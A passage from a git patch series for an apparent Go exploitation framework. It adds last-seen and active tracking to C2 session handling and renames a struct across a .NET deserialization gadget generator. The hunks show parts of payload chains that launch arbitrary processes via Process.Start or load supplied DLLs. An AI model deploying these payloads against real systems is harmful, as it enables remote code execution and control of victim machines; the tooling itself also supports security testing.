From 915b429eefba51f35532d22c4e2177ced6207d8f Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Fri, 9 May 2025 11:05:28 -0600 Subject: [PATCH 1/2] Added a LastSeen value to session and added automatic updating of it. Also added an Active param to the Session struct and changed the logic to RemoveSession(s) functions to set this value to false instead of deleting it --- c2/channel/channel.go | 64 +++++++++++++++++++++++++++++++++++++------ c2/cli/basic.go | 7 +++++ 2 files changed, 63 insertions(+), 8 deletions(-) diff --git a/c2/channel/channel.go b/c2/channel/channel.go index 3e51a33..e22b324 100644 --- a/c2/channel/channel.go +++ b/c2/channel/channel.go @@ -31,6 +31,8 @@ type Session struct { RemoteAddr string ConnectionTime time.Time conn *net.Conn + Active bool + LastSeen time.Time } // HasSessions checks if a channel has any tracked sessions. This can be used to lookup if a C2 @@ -39,7 +41,13 @@ type Session struct { // c, ok := c2.GetInstance(conf.C2Type) // c.Channel().HasSessions() func (c *Channel) HasSessions() bool { - return len(c.Sessions) > 0 + for _, sess := range c.Sessions { + if sess.Active { + return true + } + } + + return false } // AddSession adds a remote connection for session tracking. If a network connection is being @@ -65,11 +73,53 @@ func (c *Channel) AddSession(conn *net.Conn, addr string) bool { ConnectionTime: time.Now(), conn: conn, RemoteAddr: addr, + LastSeen: time.Now(), + Active: true, + } + + return true +} + +// Updates the LastSeen value for provided connection to the provided time +func (c *Channel) UpdateLastSeenByConn(conn net.Conn, timeStamp time.Time) bool { + id, ok := c.GetSessionIDByConn(conn) + if !ok { + return false + } + + session, ok := c.Sessions[id] + if !ok { + output.PrintFrameworkError("Session ID does not exist") + + return false } + session.LastSeen = timeStamp + c.Sessions[id] = session + return true } +// Returns the session ID that contains a given connection +func (c *Channel) GetSessionIDByConn(conn net.Conn) (string, bool) { + if len(c.Sessions) == 0 { + output.PrintFrameworkDebug("No sessions exist") + + return "", false + } + + for id, session := range c.Sessions { + if *session.conn == conn { + return id, true + } + } + + output.PrintFrameworkError("Conn does not exist in sessions") + + return "", false +} + + // RemoveSession removes a specific session ID and if a connection exists, closes it. func (c *Channel) RemoveSession(id string) bool { if len(c.Sessions) == 0 { @@ -77,7 +127,7 @@ func (c *Channel) RemoveSession(id string) bool { return false } - _, ok := c.Sessions[id] + session, ok := c.Sessions[id] if !ok { output.PrintFrameworkError("Session ID does not exist") @@ -86,7 +136,8 @@ func (c *Channel) RemoveSession(id string) bool { if c.Sessions[id].conn != nil { (*c.Sessions[id].conn).Close() } - delete(c.Sessions, id) + session.Active = false + c.Sessions[id] = session return true } @@ -98,11 +149,8 @@ func (c *Channel) RemoveSessions() bool { return false } - for k := range c.Sessions { - if c.Sessions[k].conn != nil { - (*c.Sessions[k].conn).Close() - } - delete(c.Sessions, k) + for id := range c.Sessions { + c.RemoveSession(id) } return true diff --git a/c2/cli/basic.go b/c2/cli/basic.go index 11d6c23..554bf8b 100644 --- a/c2/cli/basic.go +++ b/c2/cli/basic.go @@ -48,6 +48,13 @@ func backgroundResponse(ch *channel.Channel, wg *sync.WaitGroup, conn net.Conn, // could have move data to write, but the user has already called exit // below. I that that's tolerable for now. responseCh <- string(responseBuffer[:bytesRead]) + // Update "Last Seen" + ok := ch.UpdateLastSeenByConn(conn, time.Now()) + if !ok { + output.PrintFrameworkError("Failed to update LastSeen value for connection") + + return + } } time.Sleep(10 * time.Millisecond) } From 8d2a0c98ecfc9e25bc1f4a20dc4e4748154209f2 Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Fri, 24 Oct 2025 12:24:57 -0600 Subject: [PATCH 2/2] replaced confusing struct name --- dotnet/dotnetgadget.go | 138 ++++++++++++++++++------------------ dotnet/dotnetgadget_test.go | 2 +- dotnet/records.go | 12 ++-- 3 files changed, 76 insertions(+), 76 deletions(-) diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go index 3224263..c4e9606 100644 --- a/dotnet/dotnetgadget.go +++ b/dotnet/dotnetgadget.go @@ -166,7 +166,7 @@ func CreateAxHostStateDLL(dllBytes []byte, formatter string) (string, bool) { } } -// Serves a DLL in memory, used by CreateAxHostStateDLL +// Serves a DLL in memory, used by CreateAxHostStateDLL. func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { // This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one. var finalGadget string @@ -367,9 +367,9 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { }, MemberTypeInfo: ID15MemberTypeInfo, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, PrimitiveInt32(4), - BinaryObjectRecord{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}, + BinaryObjectString{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}, }, } records = append(records, systemClassWithMembersAndTypesID15) @@ -397,7 +397,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 17, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 37, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, @@ -430,7 +430,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 19, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 41, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, @@ -463,7 +463,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 21, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 45, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, @@ -496,7 +496,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 23, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 0x32, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, @@ -529,12 +529,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 25, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 54, Value: "System.Web.UI.WebControls.PagedDataSource", }, 4, - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 55, Value: "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a", }, @@ -565,12 +565,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 27, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 57, Value: "System.ComponentModel.Design.DesignerVerb", }, 4, - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 58, Value: "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", }, @@ -593,12 +593,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 29, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 61, Value: "System.Runtime.Remoting.Channels.AggregateDictionary", }, 4, - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 62, Value: "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", }, @@ -640,7 +640,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberCount: 2, }, Members: []any{ - BinaryObjectRecord{ObjectID: 65, Value: ""}, + BinaryObjectString{ObjectID: 65, Value: ""}, MemberReferenceRecord{IDRef: 65}, }, } @@ -755,12 +755,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { }, MemberTypeInfo: ID66MemberTypeInfo, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 80, Value: "System.Func`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 80, Value: "System.Func`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 62}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 62}, - BinaryObjectRecord{ObjectID: 82, Value: "System.Reflection.Assembly"}, - BinaryObjectRecord{ObjectID: 83, Value: "Load"}, + BinaryObjectString{ObjectID: 82, Value: "System.Reflection.Assembly"}, + BinaryObjectString{ObjectID: 83, Value: "Load"}, ObjectNullRecord{}, }, } @@ -789,8 +789,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 83}, MemberReferenceRecord{IDRef: 62}, MemberReferenceRecord{IDRef: 82}, - BinaryObjectRecord{ObjectID: 86, Value: "System.Reflection.Assembly Load(Byte[])"}, - BinaryObjectRecord{ObjectID: 87, Value: "System.Reflection.Assembly Load(System.Byte[])"}, + BinaryObjectString{ObjectID: 86, Value: "System.Reflection.Assembly Load(Byte[])"}, + BinaryObjectString{ObjectID: 87, Value: "System.Reflection.Assembly Load(System.Byte[])"}, 8, ObjectNullRecord{}, }, @@ -802,12 +802,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 68, MetadataID: 66, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 88, Value: "System.Func`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 88, Value: "System.Func`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 62}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 62}, MemberReferenceRecord{IDRef: 82}, - BinaryObjectRecord{ObjectID: 91, Value: "GetTypes"}, + BinaryObjectString{ObjectID: 91, Value: "GetTypes"}, ObjectNullRecord{}, }, } @@ -821,8 +821,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 91}, MemberReferenceRecord{IDRef: 62}, MemberReferenceRecord{IDRef: 82}, - BinaryObjectRecord{ObjectID: 94, Value: "System.Type[] GetTypes()"}, - BinaryObjectRecord{ObjectID: 95, Value: "System.Type[] GetTypes()"}, + BinaryObjectString{ObjectID: 94, Value: "System.Type[] GetTypes()"}, + BinaryObjectString{ObjectID: 95, Value: "System.Type[] GetTypes()"}, 8, // Corresponds with Val6 of the referenced object ObjectNullRecord{}, }, @@ -834,12 +834,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 70, MetadataID: 66, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 96, Value: "System.Func`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 96, Value: "System.Func`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 62}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 62}, - BinaryObjectRecord{ObjectID: 98, Value: "System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, - BinaryObjectRecord{ObjectID: 99, Value: "GetEnumerator"}, + BinaryObjectString{ObjectID: 98, Value: "System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 99, Value: "GetEnumerator"}, ObjectNullRecord{}, }, } @@ -853,8 +853,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x63}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x62}, - BinaryObjectRecord{ObjectID: 0x66, Value: "System.Collections.Generic.IEnumerator`1[System.Type] GetEnumerator()"}, - BinaryObjectRecord{ObjectID: 0x67, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] GetEnumerator()"}, + BinaryObjectString{ObjectID: 0x66, Value: "System.Collections.Generic.IEnumerator`1[System.Type] GetEnumerator()"}, + BinaryObjectString{ObjectID: 0x67, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] GetEnumerator()"}, 8, // Corresponds with referenced, like classWithID18 ObjectNullRecord{}, }, @@ -866,12 +866,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x48, MetadataID: 0x42, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x68, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x68, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 0x3e}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 0x3e}, - BinaryObjectRecord{ObjectID: 0x6a, Value: "System.Collections.IEnumerator"}, - BinaryObjectRecord{ObjectID: 0x6b, Value: "MoveNext"}, + BinaryObjectString{ObjectID: 0x6a, Value: "System.Collections.IEnumerator"}, + BinaryObjectString{ObjectID: 0x6b, Value: "MoveNext"}, ObjectNullRecord{}, }, } @@ -885,8 +885,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x6b}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x6a}, - BinaryObjectRecord{ObjectID: 0x6e, Value: "Boolean MoveNext()"}, - BinaryObjectRecord{ObjectID: 0x6f, Value: "System.Boolean MoveNext()"}, + BinaryObjectString{ObjectID: 0x6e, Value: "Boolean MoveNext()"}, + BinaryObjectString{ObjectID: 0x6f, Value: "System.Boolean MoveNext()"}, 8, // Corresponds with referenced, like classWithID18 ObjectNullRecord{}, }, @@ -898,12 +898,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x4a, MetadataID: 0x42, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x70, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x70, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 0x3e}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 0x3e}, - BinaryObjectRecord{ObjectID: 0x72, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, - BinaryObjectRecord{ObjectID: 0x73, Value: "get_Current"}, + BinaryObjectString{ObjectID: 0x72, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x73, Value: "get_Current"}, ObjectNullRecord{}, }, } @@ -917,8 +917,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x73}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x72}, - BinaryObjectRecord{ObjectID: 0x76, Value: "System.Type get_Current()"}, - BinaryObjectRecord{ObjectID: 0x77, Value: "System.Type get_Current()"}, + BinaryObjectString{ObjectID: 0x76, Value: "System.Type get_Current()"}, + BinaryObjectString{ObjectID: 0x77, Value: "System.Type get_Current()"}, 8, ObjectNullRecord{}, }, @@ -930,12 +930,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x4c, MetadataID: 0x42, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x78, Value: "System.Func`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x78, Value: "System.Func`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 0x3e}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 0x3e}, - BinaryObjectRecord{ObjectID: 0x7a, Value: "System.Activator"}, - BinaryObjectRecord{ObjectID: 0x7b, Value: "CreateInstance"}, + BinaryObjectString{ObjectID: 0x7a, Value: "System.Activator"}, + BinaryObjectString{ObjectID: 0x7b, Value: "CreateInstance"}, ObjectNullRecord{}, }, } @@ -949,8 +949,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x7b}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x7a}, - BinaryObjectRecord{ObjectID: 0x7e, Value: "System.Object CreateInstance(System.Type)"}, - BinaryObjectRecord{ObjectID: 0x7f, Value: "System.Object CreateInstance(System.Type)"}, + BinaryObjectString{ObjectID: 0x7e, Value: "System.Object CreateInstance(System.Type)"}, + BinaryObjectString{ObjectID: 0x7f, Value: "System.Object CreateInstance(System.Type)"}, 8, ObjectNullRecord{}, }, @@ -962,7 +962,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x4e, MetadataID: 0xf, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x80, Value: "System.ComponentModel.Design.CommandID"}, + BinaryObjectString{ObjectID: 0x80, Value: "System.ComponentModel.Design.CommandID"}, 4, MemberReferenceRecord{IDRef: 0x3a}, }, @@ -1099,8 +1099,8 @@ func CreateDataSetXMLDiffGram(payloadIn string) (string, bool) { "String", "String", } - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 3, Value: string0}) - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4, Value: string1}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 3, Value: string0}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 4, Value: string1}) classInfo := ClassInfo{ObjectID: 1, Name: className, MemberCount: len(memberNames), MemberNames: memberNames} memberTypeInfo, ok := getMemberTypeInfo(memberTypes, memberNames, additionalInfo) if !ok { @@ -1141,7 +1141,7 @@ func CreateTextFormattingRunProperties(program string, args string, formatter st return "", false } serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1} - binaryObject := BinaryObjectRecord{ObjectID: 3, Value: xmlData} + binaryObject := BinaryObjectString{ObjectID: 3, Value: xmlData} var memberValues []any memberValues = append(memberValues, binaryObject) @@ -1251,7 +1251,7 @@ func CreateDataSet(program string, args string, formatter string) (string, bool) // Finish creating the OUTER classWithMembersAndTypes using the innerClassWithMembersAndTypes as a member memberValues = append(memberValues, innerClassWithMembersAndTypes) - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 4}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 4}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 4}) memberValues = append(memberValues, false) @@ -1360,12 +1360,12 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s var obj8additionalInfo []any obj8additionalInfo = append(obj8additionalInfo, "System.DelegateSerializationHolder+DelegateEntry") var obj8MemberValues []any - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 11, Value: fmt.Sprintf("System.Func`3[[%s],[%s],[%s]]", mscorlibSystemString, mscorlibSystemString, systemlibSystemDiagString)}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 12, Value: mscorlibString}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 11, Value: fmt.Sprintf("System.Func`3[[%s],[%s],[%s]]", mscorlibSystemString, mscorlibSystemString, systemlibSystemDiagString)}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 12, Value: mscorlibString}) obj8MemberValues = append(obj8MemberValues, ObjectNullRecord{}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 13, Value: systemlibString}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 14, Value: "System.Diagnostics.Process"}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 15, Value: "Start"}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 13, Value: systemlibString}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 14, Value: "System.Diagnostics.Process"}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 15, Value: "Start"}) obj8MemberValues = append(obj8MemberValues, MemberReferenceRecord{IDRef: 16}) obj8ClassInfo := ClassInfo{ @@ -1395,8 +1395,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 15}) obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 13}) obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 14}) - obj9MemberValues = append(obj9MemberValues, BinaryObjectRecord{ObjectID: 20, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) - obj9MemberValues = append(obj9MemberValues, BinaryObjectRecord{ObjectID: 21, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) + obj9MemberValues = append(obj9MemberValues, BinaryObjectString{ObjectID: 20, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) + obj9MemberValues = append(obj9MemberValues, BinaryObjectString{ObjectID: 21, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) obj9MemberValues = append(obj9MemberValues, 8) obj9MemberValues = append(obj9MemberValues, ObjectNullRecord{}) @@ -1477,8 +1477,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s // Create arraySinglePrimitiveRecord to append before the end var arraySingleStringMembers []any - arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectRecord{ObjectID: 6, Value: args}) - arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectRecord{ObjectID: 7, Value: program}) + arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectString{ObjectID: 6, Value: args}) + arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectString{ObjectID: 7, Value: program}) arraySingleStringRecord := ArraySingleStringRecord{ ArrayInfo: ArrayInfo{ObjectID: 4, MemberCount: 2}, Members: arraySingleStringMembers, @@ -1517,11 +1517,11 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s // classWIthID 1 var classWithIDOneMemberValues []any - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 22, Value: "Compare"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 22, Value: "Compare"}) classWithIDOneMemberValues = append(classWithIDOneMemberValues, MemberReferenceRecord{IDRef: 12}) - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 24, Value: "System.String"}) - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 25, Value: "Int32 Compare(System.String, System.String)"}) - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 26, Value: "System.Int32 Compare(System.String, System.String)"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 24, Value: "System.String"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 25, Value: "Int32 Compare(System.String, System.String)"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 26, Value: "System.Int32 Compare(System.String, System.String)"}) classWithIDOneMemberValues = append(classWithIDOneMemberValues, 8) classWithIDOneMemberValues = append(classWithIDOneMemberValues, ObjectNullRecord{}) @@ -1532,7 +1532,7 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s } // classWIthID 2 var classWithIDTwoMemberValues []any - classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, BinaryObjectRecord{ObjectID: 27, Value: fmt.Sprintf("System.Comparison`1[[%s]]", mscorlibSystemString)}) + classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, BinaryObjectString{ObjectID: 27, Value: fmt.Sprintf("System.Comparison`1[[%s]]", mscorlibSystemString)}) classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, MemberReferenceRecord{IDRef: 12}) classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, ObjectNullRecord{}) classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, MemberReferenceRecord{IDRef: 12}) @@ -1618,7 +1618,7 @@ func CreateWindowsIdentity(program string, args string, formatter string) (strin innerTypeConfuseDelegateBase64 := string(b64String) var memberValues []any - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 2, Value: innerTypeConfuseDelegateBase64}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 2, Value: 